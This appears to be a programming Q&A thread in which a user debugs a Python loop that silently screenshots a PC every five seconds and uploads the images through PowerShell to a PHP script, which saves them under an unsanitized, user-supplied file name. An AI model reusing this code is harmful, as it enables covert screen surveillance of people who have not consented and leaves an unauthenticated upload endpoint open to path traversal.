# Sending a image with python to php script on webserver

Tags: php, python, image, powershell, webserver

I made this python script to take, and send, an image using powershell to an php script on a webserver:

client script:

```
import pyautogui
import subprocess
import time
import os
import getpass

directory = os.path.dirname(os.path.abspath(__file__))
whoami = cmd = subprocess.Popen("whoami", shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.PIPE)

user = whoami.stdout.read().decode()
user = user.split("\\")[1].replace(" ",'')
while True:
    try:
        place = directory + "\screenshot.png"
        screenshot = pyautogui.screenshot()
        screenshot.save(place)
        command = r"powershell +(New-Object System.Net.WebClient).UploadFile('http://ipwebserver/screen.php?name=".replace("+", '"') + user +  "', 'PUT','" + place +  "') > $null+".replace('+', '"')
        print(command)
        cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        time.sleep(5)
    except:
        print("error")
    continue
```

And the PHP script on the webserver:

```
<?php
$name = $_GET["name"];
$file = "/var/www/html/screen/" . " Screenshot " . $name;
file_put_contents($file, file_get_contents('php://input'));
?>
```

Since it is not possible to retrieve the file name using php://input I decided the best way to handle the issue is to add a query parameter called ?name=Thecomputername.

Now the wierd part is that it works when I define the variable user like this:

```
user = "Username"
```

Strangely it  **sometimes works!!** when I define the variable like this:

```
whoami = cmd = subprocess.Popen("whoami", shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.PIPE)

user = whoami.stdout.read().decode()
user = user.split("\\")[1].replace(" ",'')
```

What I'm trying to do is receive screenshots from multiple client pc's and save them to the file which belongs to that pc's username.

I've tried a lot of things and can't figure out what is causing the issue..

Anyone have any advice?

SideNote
All I need is a way to differentiate between multiple computers, I tried taking the client's IP but that didn't work either...

Comment: I dearly appreciate the artistic abstraction of this solution. May i ask why you use both Python and Powershell to accomplish the solution you're trying to build?

Comment: From my understanding it's the easiest way to upload a file with powershell to a webserver, and since the only experience with programming I have is with python I chose that...

Comment: Have you tried and output your variables as they get defined, to console? It might help if you had at least that to analyze, and find a pattern.
As for the powershell logic you make PS calculate, i have a hard time to see the desired output. It's at least something along the lines of:
http:\\ipwebserver/screen.php?name=$user 
But what more? the rest looks quite cryptic to me

Comment: I've tried printing out the variables multiple times at different steps, it doesn't appear to me to be different, also the powerhsell command works and doesnt not cause the strange behaviou,

Comment: There must be a pattern to the errors. For a start, you can implement the "whoami" part of your code, in the powershell string. You get the username easily in PS, by using $env:UserName .
Saves you a few lines, and a binary less in play.
Furthermore, create a log file with all the variable values for each run, as well as an error indicator every time the script fails, and a success indicator when it succeeds. Then ill help you look through it.

Comment: Whelp, I have no idea why but when I implemented the $env:UserName it works around 50% of the time.. Cheers for your help!

Comment: Try to close the connection every time you are done with the object. Perhaps this is a timeout issue

Comment: How is your project going so far?

Comment: Well it appeared that it would save the file randomly which got kinda frustating and I kinda abandoned it. Kinda in the middle of moving aswell meaning I couldnt spend much time on it.